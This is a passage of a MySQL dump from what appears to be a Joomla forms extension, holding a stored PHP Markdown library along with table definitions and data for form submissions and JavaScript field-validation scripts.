$marker_any = \"(?:$marker_ul|$marker_ol)\";\r\n\r\n $list = $matches[1];\r\n $list_type = preg_match(\"/$marker_ul/\", $matches[3]) ? \"ul\" : \"ol\";\r\n\r\n $marker_any = ( $list_type == \"ul\" ? $marker_ul : $marker_ol );\r\n\r\n # Turn double returns into triple returns, so that we can make a\r\n # paragraph for the last item in a list, if necessary:\r\n $list = preg_replace(\"/\\n{2,}/\", \"\\n\\n\\n\", $list);\r\n $result = _ProcessListItems($list, $marker_any);\r\n $result = \"<$list_type>\\n\" . $result . \"</$list_type>\\n\";\r\n return $result;\r\n}\r\n\r\n\r\nfunction _ProcessListItems($list_str, $marker_any) {\r\n#\r\n# Process the contents of a single ordered or unordered list, splitting it\r\n# into individual list items.\r\n#\r\n global $md_list_level;\r\n\r\n # The $md_list_level global keeps track of when we\'re inside a list.\r\n # Each time we enter a list, we increment it; when we leave a list,\r\n # we decrement. If it\'s zero, we\'re not in a list anymore.\r\n #\r\n # We do this because when we\'re not inside a list, we want to treat\r\n # something like this:\r\n #\r\n # I recommend upgrading to version\r\n # 8. Oops, now this line is treated\r\n # as a sub-list.\r\n #\r\n # As a single paragraph, despite the fact that the second line starts\r\n # with a digit-period-space sequence.\r\n #\r\n # Whereas when we\'re inside a list (or sub-list), that line will be\r\n # treated as the start of a sub-list. What a kludge, huh? This is\r\n # an aspect of Markdown\'s syntax that\'s hard to parse perfectly\r\n # without resorting to mind-reading. Perhaps the solution is to\r\n # change the syntax rules such that sub-lists must start with a\r\n # starting cardinal number; e.g. \"1.\" or \"a.\".\r\n\r\n $md_list_level++;\r\n\r\n # trim trailing blank lines:\r\n $list_str = preg_replace(\"/\\n{2,}\\\\z/\", \"\\n\", $list_str);\r\n\r\n $list_str = preg_replace_callback(\'{\r\n (\\n)? # leading line = $1\r\n (^[ \\t]*) # leading whitespace = $2\r\n (\'.$marker_any.\') [ \\t]+ # list marker = $3\r\n ((?s:.+?) # list item text = $4\r\n (\\n{1,2}))\r\n (?= \\n* (\\z | \\2 (\'.$marker_any.\') [ \\t]+))\r\n }xm\',\r\n \'_ProcessListItems_callback\', $list_str);\r\n\r\n $md_list_level--;\r\n return $list_str;\r\n}\r\nfunction _ProcessListItems_callback($matches) {\r\n $item = $matches[4];\r\n $leading_line =& $matches[1];\r\n $leading_space =& $matches[2];\r\n\r\n if ($leading_line || preg_match(\'/\\n{2,}/\', $item)) {\r\n $item = _RunBlockGamut(_Outdent($item));\r\n }\r\n else {\r\n # Recursion for sub-lists:\r\n $item = _DoLists(_Outdent($item));\r\n $item = preg_replace(\'/\\n+$/\', \'\', $item);\r\n $item = _RunSpanGamut($item);\r\n }\r\n\r\n return \"<li>\" . $item . \"</li>\\n\";\r\n}\r\n\r\n\r\nfunction _DoCodeBlocks($text) {\r\n#\r\n# Process Markdown `<pre><code>` blocks.\r\n#\r\n global $md_tab_width;\r\n $text = preg_replace_callback(\"{\r\n (?:\\\\n\\\\n|\\\\A)\r\n ( # $1 = the code block -- one or more lines, starting with a space/tab\r\n (?:\r\n (?:[ ]\\{$md_tab_width} | \\\\t) # Lines must start with a tab or a tab-width of spaces\r\n .*\\\\n+\r\n )+\r\n )\r\n ((?=^[ ]{0,$md_tab_width}\\\\S)|\\\\Z) # Lookahead for non-space at line-start, or end of doc\r\n }xm\",\r\n \'_DoCodeBlocks_callback\', $text);\r\n\r\n return $text;\r\n}\r\nfunction _DoCodeBlocks_callback($matches) {\r\n $codeblock = $matches[1];\r\n\r\n $codeblock = _EncodeCode(_Outdent($codeblock));\r\n// $codeblock = _Detab($codeblock);\r\n # trim leading newlines and trailing whitespace\r\n $codeblock = preg_replace(array(\'/\\A\\n+/\', \'/\\s+\\z/\'), \'\', $codeblock);\r\n\r\n $result = \"\\n\\n<pre><code>\" . $codeblock . \"\\n</code></pre>\\n\\n\";\r\n\r\n return $result;\r\n}\r\n\r\n\r\nfunction _DoCodeSpans($text) {\r\n#\r\n# * Backtick quotes are used for <code></code> spans.\r\n#\r\n# * You can use multiple backticks as the delimiters if you want to\r\n# include literal backticks in the code span. So, this input:\r\n#\r\n# Just type ``foo `bar` baz`` at the prompt.\r\n#\r\n# Will translate to:\r\n#\r\n# <p>Just type <code>foo `bar` baz</code> at the prompt.</p>\r\n#\r\n# There\'s no arbitrary limit to the number of backticks you\r\n# can use as delimters. If you need three consecutive backticks\r\n# in your code, use four for delimiters, etc.\r\n#\r\n# * You can use spaces to get literal backticks at the edges:\r\n#\r\n# ... type `` `bar` `` ...\r\n#\r\n# Turns to:\r\n#\r\n# ... type <code>`bar`</code> ...\r\n#\r\n $text = preg_replace_callback(\'@\r\n (?<!\\\\\\) # Character before opening ` can\\\'t be a backslash\r\n (`+) # $1 = Opening run of `\r\n (.+?) # $2 = The code block\r\n (?<!`)\r\n \\1 # Matching closer\r\n (?!`)\r\n @xs\',\r\n \'_DoCodeSpans_callback\', $text);\r\n\r\n return $text;\r\n}\r\nfunction _DoCodeSpans_callback($matches) {\r\n $c = $matches[2];\r\n $c = preg_replace(\'/^[ \\t]*/\', \'\', $c); # leading whitespace\r\n $c = preg_replace(\'/[ \\t]*$/\', \'\', $c); # trailing whitespace\r\n $c = _EncodeCode($c);\r\n return \"<code>$c</code>\";\r\n}\r\n\r\n\r\nfunction _EncodeCode($_) {\r\n#\r\n# Encode/escape certain characters inside Markdown code runs.\r\n# The point is that in code, these characters are literals,\r\n# and lose their special Markdown meanings.\r\n#\r\n global $md_escape_table;\r\n\r\n # Encode all ampersands; HTML entities are not\r\n # entities within a Markdown code span.\r\n $_ = str_replace(\'&\', \'&\', $_);\r\n\r\n # Do the angle bracket song and dance:\r\n $_ = str_replace(array(\'<\', \'>\'),\r\n array(\'<\', \'>\'), $_);\r\n\r\n # Now, escape characters that are magic in Markdown:\r\n $_ = str_replace(array_keys($md_escape_table),\r\n array_values($md_escape_table), $_);\r\n\r\n return $_;\r\n}\r\n\r\n\r\nfunction _DoItalicsAndBold($text) {\r\n # <strong> must go first:\r\n $text = preg_replace(\'{\r\n ( # $1: Marker\r\n (?<!\\*\\*) \\*\\* | # (not preceded by two chars of\r\n (?<!__) __ # the same marker)\r\n )\r\n (?=\\S) # Not followed by whitespace\r\n (?!\\1) # or two others marker chars.\r\n ( # $2: Content\r\n (?:\r\n [^*_]+? # Anthing not em markers.\r\n |\r\n # Balence any regular emphasis inside.\r\n ([*_]) (?=\\S) .+? (?<=\\S) \\3 # $3: em char (* or _)\r\n |\r\n (?! \\1 ) . # Allow unbalenced * and _.\r\n )+?\r\n )\r\n (?<=\\S) \\1 # End mark not preceded by whitespace.\r\n }sx\',\r\n \'<strong>\\2</strong>\', $text);\r\n # Then <em>:\r\n $text = preg_replace(\r\n \'{ ( (?<!\\*)\\* | (?<!_)_ ) (?=\\S) (?! \\1) (.+?) (?<=\\S) \\1 }sx\',\r\n \'<em>\\2</em>\', $text);\r\n\r\n return $text;\r\n}\r\n\r\n\r\nfunction _DoBlockQuotes($text) {\r\n $text = preg_replace_callback(\'/\r\n ( # Wrap whole match in $1\r\n (\r\n ^[ \\t]*>[ \\t]? # \">\" at the start of a line\r\n .+\\n # rest of the first line\r\n (.+\\n)* # subsequent consecutive lines\r\n \\n* # blanks\r\n )+\r\n )\r\n /xm\',\r\n \'_DoBlockQuotes_callback\', $text);\r\n\r\n return $text;\r\n}\r\nfunction _DoBlockQuotes_callback($matches) {\r\n $bq = $matches[1];\r\n # trim one level of quoting - trim whitespace-only lines\r\n $bq = preg_replace(array(\'/^[ \\t]*>[ \\t]?/m\', \'/^[ \\t]+$/m\'), \'\', $bq);\r\n $bq = _RunBlockGamut($bq); # recurse\r\n\r\n $bq = preg_replace(\'/^/m\', \" \", $bq);\r\n # These leading spaces screw with <pre> content, so we need to fix that:\r\n $bq = preg_replace_callback(\'{(\\s*<pre>.+?</pre>)}sx\',\r\n \'_DoBlockQuotes_callback2\', $bq);\r\n\r\n return \"<blockquote>\\n$bq\\n</blockquote>\\n\\n\";\r\n}\r\nfunction _DoBlockQuotes_callback2($matches) {\r\n $pre = $matches[1];\r\n $pre = preg_replace(\'/^ /m\', \'\', $pre);\r\n return $pre;\r\n}\r\n\r\n\r\nfunction _FormParagraphs($text) {\r\n#\r\n# Params:\r\n# $text - string to process with html <p> tags\r\n#\r\n global $md_html_blocks;\r\n\r\n # Strip leading and trailing lines:\r\n $text = preg_replace(array(\'/\\A\\n+/\', \'/\\n+\\z/\'), \'\', $text);\r\n\r\n $grafs = preg_split(\'/\\n{2,}/\', $text, -1, PREG_SPLIT_NO_EMPTY);\r\n\r\n #\r\n # Wrap <p> tags.\r\n #\r\n foreach ($grafs as $key => $value) {\r\n if (!isset( $md_html_blocks[$value] )) {\r\n $value = _RunSpanGamut($value);\r\n $value = preg_replace(\'/^([ \\t]*)/\', \'<p>\', $value);\r\n $value .= \"</p>\";\r\n $grafs[$key] = $value;\r\n }\r\n }\r\n\r\n #\r\n # Unhashify HTML blocks\r\n #\r\n foreach ($grafs as $key => $value) {\r\n if (isset( $md_html_blocks[$value] )) {\r\n $grafs[$key] = $md_html_blocks[$value];\r\n }\r\n }\r\n\r\n return implode(\"\\n\\n\", $grafs);\r\n}\r\n\r\n\r\nfunction _EncodeAmpsAndAngles($text) {\r\n# Smart processing for ampersands and angle brackets that need to be encoded.\r\n\r\n # Ampersand-encoding based entirely on Nat Irons\'s Amputator MT plugin:\r\n # http://bumppo.net/projects/amputator/\r\n $text = preg_replace(\'/&(?!#?[xX]?(?:[0-9a-fA-F]+|\\w+);)/\',\r\n \'&\', $text);;\r\n\r\n # Encode naked <\'s\r\n $text = preg_replace(\'{<(?![a-z/?\\$!])}i\', \'<\', $text);\r\n\r\n return $text;\r\n}\r\n\r\n\r\nfunction _EncodeBackslashEscapes($text) {\r\n#\r\n# Parameter: String.\r\n# Returns: The string, with after processing the following backslash\r\n# escape sequences.\r\n#\r\n global $md_escape_table, $md_backslash_escape_table;\r\n # Must process escaped backslashes first.\r\n return str_replace(array_keys($md_backslash_escape_table),\r\n array_values($md_backslash_escape_table), $text);\r\n}\r\n\r\n\r\nfunction _DoAutoLinks($text) {\r\n $text = preg_replace(\"!<((https?|ftp):[^\'\\\">\\\\s]+)>!\",\r\n \'<a href=\"\\1\">\\1</a>\', $text);\r\n\r\n # Email addresses: <address@domain.foo>\r\n $text = preg_replace(\'{\r\n <\r\n (?:mailto:)?\r\n (\r\n [-.\\w]+\r\n \\@\r\n [-a-z0-9]+(\\.[-a-z0-9]+)*\\.[a-z]+\r\n )\r\n >\r\n }exi\',\r\n \"_EncodeEmailAddress(_UnescapeSpecialChars(_UnslashQuotes(\'\\\\1\')))\",\r\n $text);\r\n\r\n return $text;\r\n}\r\n\r\n\r\nfunction _EncodeEmailAddress($addr) {\r\n#\r\n# Input: an email address, e.g. \"foo@example.com\"\r\n#\r\n# Output: the email address as a mailto link, with each character\r\n# of the address encoded as either a decimal or hex entity, in\r\n# the hopes of foiling most address harvesting spam bots. E.g.:\r\n#\r\n# <a href=\"mailto:foo@e\r\n# xample.com\">foo\r\n# @example.com</a>\r\n#\r\n# Based by a filter by Matthew Wickline, posted to the BBEdit-Talk\r\n# mailing list: <http://tinyurl.com/yu7ue>\r\n#\r\n $addr = \"mailto:\" . $addr;\r\n $length = strlen($addr);\r\n\r\n # leave \':\' alone (to spot mailto: later)\r\n $addr = preg_replace_callback(\'/([^\\:])/\',\r\n \'_EncodeEmailAddress_callback\', $addr);\r\n\r\n $addr = \"<a href=\\\"$addr\\\">$addr</a>\";\r\n # strip the mailto: from the visible part\r\n $addr = preg_replace(\'/\">.+?:/\', \'\">\', $addr);\r\n\r\n return $addr;\r\n}\r\nfunction _EncodeEmailAddress_callback($matches) {\r\n $char = $matches[1];\r\n $r = rand(0, 100);\r\n # roughly 10% raw, 45% hex, 45% dec\r\n # \'@\' *must* be encoded. I insist.\r\n if ($r > 90 && $char != \'@\') return $char;\r\n if ($r < 45) return \'&#x\'.dechex(ord($char)).\';\';\r\n return \'&#\'.ord($char).\';\';\r\n}\r\n\r\n\r\nfunction _UnescapeSpecialChars($text) {\r\n#\r\n# Swap back in all the special characters we\'ve hidden.\r\n#\r\n global $md_escape_table;\r\n return str_replace(array_values($md_escape_table),\r\n array_keys($md_escape_table), $text);\r\n}\r\n\r\n\r\n# _TokenizeHTML is shared between PHP Markdown and PHP SmartyPants.\r\n# We only define it if it is not already defined.\r\nif (!function_exists(\'_TokenizeHTML\')) :\r\nfunction _TokenizeHTML($str) {\r\n#\r\n# Parameter: String containing HTML markup.\r\n# Returns: An array of the tokens comprising the input\r\n# string. Each token is either a tag (possibly with nested,\r\n# tags contained therein, such as <a href=\"<MTFoo>\">, or a\r\n# run of text between tags. Each element of the array is a\r\n# two-element array; the first is either \'tag\' or \'text\';\r\n# the second is the actual value.\r\n#\r\n#\r\n# Regular expression derived from the _tokenize() subroutine in\r\n# Brad Choate\'s MTRegex plugin.\r\n# <http://www.bradchoate.com/past/mtregex.php>\r\n#\r\n $index = 0;\r\n $tokens = array();\r\n\r\n $match = \'(?s:<!(?:--.*?--\\s*)+>)|\'. # comment\r\n \'(?s:<\\?.*?\\?>)|\'. # processing instruction\r\n # regular tags\r\n \'(?:<[/!$]?[-a-zA-Z0-9:]+\\b(?>[^\"\\\'>]+|\"[^\"]*\"|\\\'[^\\\']*\\\')*>)\';\r\n\r\n $parts = preg_split(\"{($match)}\", $str, -1, PREG_SPLIT_DELIM_CAPTURE);\r\n\r\n foreach ($parts as $part) {\r\n if (++$index % 2 && $part != \'\')\r\n $tokens[] = array(\'text\', $part);\r\n else\r\n $tokens[] = array(\'tag\', $part);\r\n }\r\n\r\n return $tokens;\r\n}\r\nendif;\r\n\r\n\r\nfunction _Outdent($text) {\r\n#\r\n# Remove one level of line-leading tabs or spaces\r\n#\r\n global $md_tab_width;\r\n return preg_replace(\"/^(\\\\t|[ ]{1,$md_tab_width})/m\", \"\", $text);\r\n}\r\n\r\n\r\nfunction _Detab($text) {\r\n#\r\n# Replace tabs with the appropriate amount of space.\r\n#\r\n global $md_tab_width;\r\n\r\n # For each line we separate the line in blocks delemited by\r\n # tab characters. Then we reconstruct every line by adding the\r\n # appropriate number of space between each blocks.\r\n\r\n $lines = explode(\"\\n\", $text);\r\n $text = \"\";\r\n\r\n foreach ($lines as $line) {\r\n # Split in blocks.\r\n $blocks = explode(\"\\t\", $line);\r\n # Add each blocks to the line.\r\n $line = $blocks[0];\r\n unset($blocks[0]); # Do not add first block twice.\r\n foreach ($blocks as $block) {\r\n # Calculate amount of space, insert spaces, insert block.\r\n $amount = $md_tab_width - strlen($line) % $md_tab_width;\r\n $line .= str_repeat(\" \", $amount) . $block;\r\n }\r\n $text .= \"$line\\n\";\r\n }\r\n return $text;\r\n}\r\n\r\n\r\nfunction _UnslashQuotes($text) {\r\n#\r\n# This function is useful to remove automaticaly slashed double quotes\r\n# when using preg_replace and evaluating an expression.\r\n# Parameter: String.\r\n# Returns: The string with any slash-double-quote (\\\") sequence replaced\r\n# by a single double quote.\r\n#\r\n return str_replace(\'\\\"\', \'\"\', $text);\r\n}\r\n\r\n\r\n/*\r\n\r\nPHP Markdown\r\n============\r\n\r\nDescription\r\n-----------\r\n\r\nThis is a PHP translation of the original Markdown formatter written in\r\nPerl by John Gruber.\r\n\r\nMarkdown is a text-to-HTML filter; it translates an easy-to-read /\r\neasy-to-write structured text format into HTML. Markdown\'s text format\r\nis most similar to that of plain text email, and supports features such\r\nas headers, *emphasis*, code blocks, blockquotes, and links.\r\n\r\nMarkdown\'s syntax is designed not as a generic markup language, but\r\nspecifically to serve as a front-end to (X)HTML. You can use span-level\r\nHTML tags anywhere in a Markdown document, and you can use block level\r\nHTML tags (like <div> and <table> as well).\r\n\r\nFor more information about Markdown\'s syntax, see:\r\n\r\n<http://daringfireball.net/projects/markdown/>\r\n\r\n\r\nBugs\r\n----\r\n\r\nTo file bug reports please send email to:\r\n\r\n<michel.fortin@michelf.com>\r\n\r\nPlease include with your report: (1) the example input; (2) the output you\r\nexpected; (3) the output Markdown actually produced.\r\n\r\n\r\nVersion History\r\n---------------\r\n\r\nSee the readme file for detailed release notes for this version.\r\n\r\n1.0.1b - 6 Jun 2005\r\n\r\n1.0.1a - 15 Apr 2005\r\n\r\n1.0.1 - 16 Dec 2004\r\n\r\n1.0 - 21 Aug 2004\r\n\r\n\r\nAuthor & Contributors\r\n---------------------\r\n\r\nOriginal Perl version by John Gruber\r\n<http://daringfireball.net/>\r\n\r\nPHP port and other contributions by Michel Fortin\r\n<http://www.michelf.com/>\r\n\r\n\r\nCopyright and License\r\n---------------------\r\n\r\nCopyright (c) 2004-2005 Michel Fortin\r\n<http://www.michelf.com/>\r\nAll rights reserved.\r\n\r\nCopyright (c) 2003-2004 John Gruber\r\n<http://daringfireball.net/>\r\nAll rights reserved.\r\n\r\nRedistribution and use in source and binary forms, with or without\r\nmodification, are permitted provided that the following conditions are\r\nmet:\r\n\r\n* Redistributions of source code must retain the above copyright notice,\r\n this list of conditions and the following disclaimer.\r\n\r\n* Redistributions in binary form must reproduce the above copyright\r\n notice, this list of conditions and the following disclaimer in the\r\n documentation and/or other materials provided with the distribution.\r\n\r\n* Neither the name \"Markdown\" nor the names of its contributors may\r\n be used to endorse or promote products derived from this software\r\n without specific prior written permission.\r\n\r\nThis software is provided by the copyright holders and contributors \"as\r\nis\" and any express or implied warranties, including, but not limited\r\nto, the implied warranties of merchantability and fitness for a\r\nparticular purpose are disclaimed. In no event shall the copyright owner\r\nor contributors be liable for any direct, indirect, incidental, special,\r\nexemplary, or consequential damages (including, but not limited to,\r\nprocurement of substitute goods or services; loss of use, data, or\r\nprofits; or business interruption) however caused and on any theory of\r\nliability, whether in contract, strict liability, or tort (including\r\nnegligence or otherwise) arising in any way out of the use of this\r\nsoftware, even if advised of the possibility of such damage.\r\n\r\n*/');
/*!40000 ALTER TABLE `atlyh_facileforms_pieces` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_facileforms_records`
--
DROP TABLE IF EXISTS `atlyh_facileforms_records`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_facileforms_records` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`submitted` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`form` int(11) NOT NULL DEFAULT 0,
`title` varchar(255) NOT NULL DEFAULT '',
`name` varchar(255) NOT NULL DEFAULT '',
`ip` varchar(30) NOT NULL DEFAULT '',
`browser` varchar(255) NOT NULL DEFAULT '',
`opsys` varchar(255) NOT NULL DEFAULT '',
`provider` varchar(255) NOT NULL DEFAULT '',
`viewed` tinyint(1) NOT NULL DEFAULT 0,
`exported` tinyint(1) NOT NULL DEFAULT 0,
`archived` tinyint(1) NOT NULL DEFAULT 0,
`user_id` int(11) NOT NULL DEFAULT 0,
`username` varchar(255) NOT NULL DEFAULT '',
`user_full_name` varchar(255) NOT NULL DEFAULT '',
`paypal_tx_id` varchar(255) NOT NULL DEFAULT '',
`paypal_payment_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`paypal_testaccount` tinyint(1) NOT NULL DEFAULT 0,
`paypal_download_tries` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_facileforms_records`
--
LOCK TABLES `atlyh_facileforms_records` WRITE;
/*!40000 ALTER TABLE `atlyh_facileforms_records` DISABLE KEYS */;
INSERT INTO `atlyh_facileforms_records` VALUES (1,'2016-02-28 10:30:11',1,'Contact','Contact','::1','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:44.0) Gecko/20100101 Firefox/44.0','mac','Unknown',0,0,0,0,'-','-','','0000-00-00 00:00:00',0,0);
/*!40000 ALTER TABLE `atlyh_facileforms_records` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_facileforms_scripts`
--
DROP TABLE IF EXISTS `atlyh_facileforms_scripts`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_facileforms_scripts` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`published` tinyint(1) NOT NULL DEFAULT 0,
`package` varchar(30) NOT NULL DEFAULT '',
`name` varchar(30) NOT NULL DEFAULT '',
`title` varchar(50) NOT NULL DEFAULT '',
`description` text DEFAULT NULL,
`type` varchar(30) NOT NULL DEFAULT '',
`code` text DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=45 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_facileforms_scripts`
--
LOCK TABLES `atlyh_facileforms_scripts` WRITE;
/*!40000 ALTER TABLE `atlyh_facileforms_scripts` DISABLE KEYS */;
INSERT INTO `atlyh_facileforms_scripts` VALUES (1,1,'FF','ff_anychecked','Any Checked','Validate that any radio button or checkbox of a group is checked.','Element Validation','function ff_anychecked(element, message)\r\n{\r\n // get plain name\r\n // alert(document.ff_form52[\'ff_nm_bfQuickMode6303958[]\']);\r\n // alert(document.getElementById(element.id).id);\r\n var name = \'\';\r\n if(!element.name){\r\n if(element.length && element.length != 0){\r\n name = element[0].name;\r\n var cnt = 0;\r\n for (var i = 0; i < element.length; i++)\r\n if (element[i].name==name) \r\n if (element[i].checked) cnt++; \r\n if (cnt==0) {\r\n ff_validationFocus(element[0].name);\r\n if (message==\'\') message = \"Please check or select \"+name+\".\\n\";\r\n return message;\r\n } // if \r\n\r\n } else {\r\n return \'\';\r\n }\r\n } else {\r\n name = element.name;\r\n if (name.substr(0,6) == \'ff_nm_\') name = name.substring(6,name.length-2);\r\n\r\n // loop through elements and count selections\r\n var cnt = 0;\r\n for (var i = 0; i < ff_elements.length; i++)\r\n if (ff_elements[i][2]==name) \r\n if (ff_getElementByIndex(i).checked) cnt++;\r\n\r\n // if none selected, emitt error\r\n if (cnt==0) {\r\n ff_validationFocus(element.name);\r\n if (message==\'\') message = \"Please check or select \"+name+\".\\n\";\r\n return message;\r\n } // if\r\n }\r\n \r\n return \'\';\r\n} // ff_anychecked'),(2,1,'FF','ff_checked','Checked','Validate that radio button or checkbox is checked.','Element Validation','function ff_checked(element, message)\r\n{\r\n if (element.checked) \r\n return \'\'; \r\n else {\r\n if (message==\'\') message = element.name+\" is not checked.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } \r\n}'),(3,1,'FF','ff_checkedValue','Get checked value','Get value of the currently checked radiobutton.','Untyped','function ff_checkedValue(name)\r\n{\r\n // loop through elements and find checked\r\n for (i = 0; i < ff_elements.length; i++)\r\n if (ff_elements[i][2]==name) {\r\n e = ff_getElementByIndex(i);\r\n if (e.checked) return e.value;\r\n } // if \r\n return \'\';\r\n} // ff_checkedValue'),(4,1,'FF','ff_countQuerySelections','Count Query Selections','Counts how many checkboxes/radiobuttons are checked/selected in a query list element','Untyped','function ff_countQuerySelections(name)\r\n{\r\n var id = ff_getIdByName(name);\r\n var cnt = ff_queryRows[id].length;\r\n var pagesize = ff_queryPageSize[id];\r\n if (pagesize>0) {\r\n var currpage = ff_queryCurrPage[id];\r\n var p;\r\n for (p = 1; p < currpage; p++) cnt -= pagesize;\r\n if (cnt > pagesize) cnt = pagesize;\r\n } // if\r\n var curr;\r\n var sels = 0;\r\n for (curr = 0; curr < cnt; curr++)\r\n if (document.getElementById(\'ff_cb\'+id+\'_\'+curr).checked) sels++;\r\n return sels;\r\n} // ff_countQuerySelections'),(5,1,'FF','ff_dollaramount2dp','Dollar Amount with 2 Decimal Places','Validate that a dollar amount with two decimal places is entered.','Element Validation','function ff_dollaramount2dp(element, message)\r\n{\r\n var ex = /^\\d+$|^\\d+\\.\\d{2}$/;\r\n if (!ex.test(element.value)) {\r\n if (message==\'\') message = element.name+\" must be a number with two decimal places.\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n } // if\r\n return \'\';\r\n} // ff_dollaramount2dp'),(6,1,'FF','ff_expString','String export','Export string function: escapes special characters of a string','Untyped','function ff_expString(text)\r\n{\r\n text = trim(text);\r\n var i;\r\n var o = \'\';\r\n for(i = 0; i < text.length; i++) {\r\n c = text.charAt(i);\r\n switch(c) {\r\n case \';\' : o += \'\\\\x3B\'; break;\r\n case \',\' : o += \'\\\\x2C\'; break;\r\n case \'&\' : o += \'\\\\x26\'; break;\r\n case \'<\' : o += \'\\\\x3C\'; break;\r\n case \'>\' : o += \'\\\\x3E\'; break;\r\n case \'\\\'\': o += \'\\\\x27\'; break;\r\n case \'\\\\\': o += \'\\\\x5C\'; break;\r\n case \'\"\' : o += \'\\\\x22\'; break;\r\n case \'\\n\': o += \'\\\\n\'; break;\r\n case \'\\r\': o += \'\\\\r\'; break;\r\n default: o += c;\r\n } // switch\r\n } // for\r\n return o;\r\n} // expString'),(7,1,'FF','ff_flashupload_not_empty','Flash Upload Not Empty (QuickMode only!)','Validates if a flash upload is empty or not.','Element Validation','function ff_flashupload_not_empty(element, message)\r\n{\r\n if(typeof bfSummarizers == \"undefined\") { alert(\"Flash upload validation only available in QuickMode!\"); return \'\'}\r\n if(JQuery(\'#bfFlashFileQueue\'+element.id.split(\'ff_elem\')[1]).html() != \'\') return \'\';\r\n if (message==\'\') message = \"Please enter \"+element.name+\".\\n\";\r\n ff_validationFocus(element.name);\r\n return message;\r\n} // ff_valuenotempty'),(8,1,'FF','ff_getfocus','Get focus','Get the focus. Usually this is for the first element of the form/page.','Element Init','function ff_getfocus(element,condition)\r\n{\r\n if(!element.name){\r\n if(element.length && element.length != 0){\r\n element[0].focus();\r\n }\r\n }else{\r\n element.focus();\r\n }\r\n}'),(9,1,'FF','ff_getQuerySelectedRows','Get Query Selected Rows','Returns the selected rows in a 2-dimensional array','Untyped','function ff_getQuerySelectedRows(name)\r\n{\r\n var id = ff_getIdByName(name);\r\n var rcnt = ff_queryRows[id].length;\r\n var cnt = rcnt;\r\n var pagesize = ff_queryPageSize[id];\r\n if (pagesize>0) {\r\n var currpage = ff_queryCurrPage[id];\r\n var p;\r\n for (p = 1; p < currpage; p++) cnt -= pagesize;\r\n if (cnt > pagesize) cnt = pagesize;\r\n } // if\r\n var curr, r;\r\n var selcnt = 0;\r\n var sels = new Array;\r\n for (curr = 0; curr < cnt; curr++) {\r\n var elem = document.getElementById(\'ff_cb\'+id+\'_\'+curr);\r\n if (elem.checked) {\r\n var ident = elem.value;\r\n for (r = 0; r < rcnt; r++)\r\n if (ff_queryRows[id][r][0] == ident) {\r\n sels[selcnt++] = ff_queryRows[id][r];\r\n break;\r\n } // if\r\n } // if\r\n } // for\r\n return sels;\r\n} // ff_getQuerySelectedRows'),(10,1,'FF','ff_getQuerySelections','Get Query Selected ID\'s','Returns the column values of the checked/selected checkboxes/radiobuttons in an array','Untyped','function ff_getQuerySelections(name)\r\n{\r\n var id = ff_getIdByName(name);\r\n var cnt = ff_queryRows[id].length;\r\n var pagesize = ff_queryPageSize[id];\r\n if (pagesize>0) {\r\n var currpage = ff_queryCurrPage[id];\r\n var p;\r\n for (p = 1; p < currpage; p++) cnt -= pagesize;\r\n if (cnt > pagesize) cnt = pagesize;\r\n } // if\r\n var curr;\r\n var selcnt = 0;\r\n var sels = new Array;\r\n for (curr = 0; curr < cnt; curr++) {\r\n var elem = document.getElementById(\'ff_cb\'+id+\'_\'+curr);\r\n if (elem.checked) \r\n sels[selcnt++] = elem.value;\r\n } // for\r\n return sels;\r\n} // ff_getQuerySelections'),(11,1,'FF','ff_htmlvaluenotempty','HTML Texteditor Not Empty','Checks if an HTML editor element is empty or not','Element Validation','function ff_htmlvaluenotempty( element, message ){\r\n \r\n if( typeof bf_htmltextareanames == \"undefined\" ) return \'\';\r\n\r\n var content = \"\";\r\n\r\n for(var i = 0; i < bf_htmltextareanames.length; i++){\r\n if( element.name == bf_htmltextareanames[i] ) {\r\n eval(\"content = \" + bf_htmltextareas[i]);\r\n break;\r\n }\r\n }\r\n if (JQuery.trim(content) == \"\") {\r\n if (message==\'\') message = element.name+\" must not be empty.\\n\";\r\n return message;\r\n } // if\r\n return \'\';\r\n}'),(12,1,'FF','ff_impString','String import','Import string function: unescapes c-coded characters of a string','Untyped','function ff_impString(text)\r\n{\r\n var str = \'\';\r\n var ss = 0;\r\n var s;\r\n var tl = text.length;\r\n var hexdigs = \"0123456789abcdefABCDEF\";\r\n while (ss < tl) {\r\n s = text.charAt(ss++);\r\n if (s == \'\\\\\') {\r\n if (ss < tl) s = text.charAt(ss++); else s = 0;\r\n switch (s) {\r\n case 0 : break;\r\n case \'e\' : str += \'\\33\'; break;\r\n case \'t\' : str += \'\\t\'; break;\r\n case \'r\' : str += \'\\r\'; break;\r\n case \'n\' : str += \'\\n\'; break;\r\n case \'f\' : str += \'\\f\'; break;\r\n case \'x\' : {\r\n if (ss < tl) s = text.charAt(ss++); else s = 0;\r\n var ch = \'\';\r\n while (hexdigs.indexOf(s)>=0 && ch.length < 2) {\r\n ch += s;\r\n if (ss < tl) s = text.charAt(ss++); else s = 0;\r\n } // while\r\n while (ch.length < 2) ch = \'0\'+ch;\r\n str += unescape(\'%\'+ch);\r\n if (s) ss--;\r\n break;\r\n }\r\n default:\r\n str += s;\r\n } // switch\r\n } else\r\n str += s;\r\n } // while\r\n return str;\r\n} // impString'),(13,1,'FF','ff_integer','Integer Number','Validate that an integer value is entered.','Element Validation','function ff_integer(element, message)\r\n{\r\n var ex = /(^-?\\d\\d*$)/;\r\n if (!ex.test(element.value)) {\r\n 